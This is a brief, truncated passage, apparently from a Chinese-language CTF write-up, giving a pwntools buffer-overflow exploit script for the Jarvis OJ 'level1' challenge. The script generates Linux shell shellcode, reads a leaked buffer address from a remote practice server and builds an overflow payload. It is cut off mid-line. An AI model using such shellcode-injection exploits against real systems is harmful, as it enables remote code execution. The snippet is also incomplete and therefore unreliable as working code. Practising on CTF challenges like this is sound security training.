4.具体脚本如下: # coding:utf-8frompwn import*context.log_level='debug'shellcode=asm(shellcraft.i386.linux.sh())#生成响应环境的shellcode sh=remote('pwn2.jarvisoj.com',9877)# sh = process('./level1')# elf = ELF('./level1')line=sh.recvline()[14:-2]#获取buf地址 buf_addr=int(line,16)#将字符串地址转换成十进制 payload=shellcode+'A'*(0x88+0x4-len(shel...